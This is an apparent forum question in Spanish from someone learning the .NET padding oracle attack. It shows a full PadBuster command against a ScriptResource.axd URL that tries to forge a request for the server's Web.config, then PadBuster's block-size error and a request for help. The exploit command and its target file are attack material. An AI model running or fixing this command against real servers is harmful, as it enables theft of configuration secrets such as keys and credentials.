Como novedad en este tipo de ataque, al tratar de entender este .net oracle padding attack, estoy usando estos datos:
padbuster https://victim.org/ScriptResource.axd?d=EkIw9i8hChjP_nuqGrT3s8rxntkAiG3TGimvybqMf__tcw10GCO0odSOA1XbLy49N6SbB7O3zkdZuSKdG8IJgRcjH0myrb2kCR0Epem-HDIB7vYIUr_71uvYarEEFTV6Szv50Wpsr0A0218420DiUU1D4-NcTi4zxgAJaW8owIQ1 EkIw9i8hChjP_nuqGrT3s8rxntkAiG3TGimvybqMf__tcw10GCO0odSOA1XbLy49N6SbB7O3zkdZuSKdG8IJgRcjH0myrb2kCR0Epem-HDIB7vYIUr_71uvYarEEFTV6Szv50Wpsr0A0218420DiUU1D4-NcTi4zxgAJaW8owIQ1 -plaintext "|||~/Web.config" 16
Y veo este error:
+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| [email protected] |
+-------------------------------------------+
ERROR: Encrypted Bytes must be evenly divisible by Block Size (16)
Encrypted sample length is 124. Double check the Encoding and Block Size.
Estoy haciendo algo mal? o ¿cuál es el tamaño de bloque correcto 124?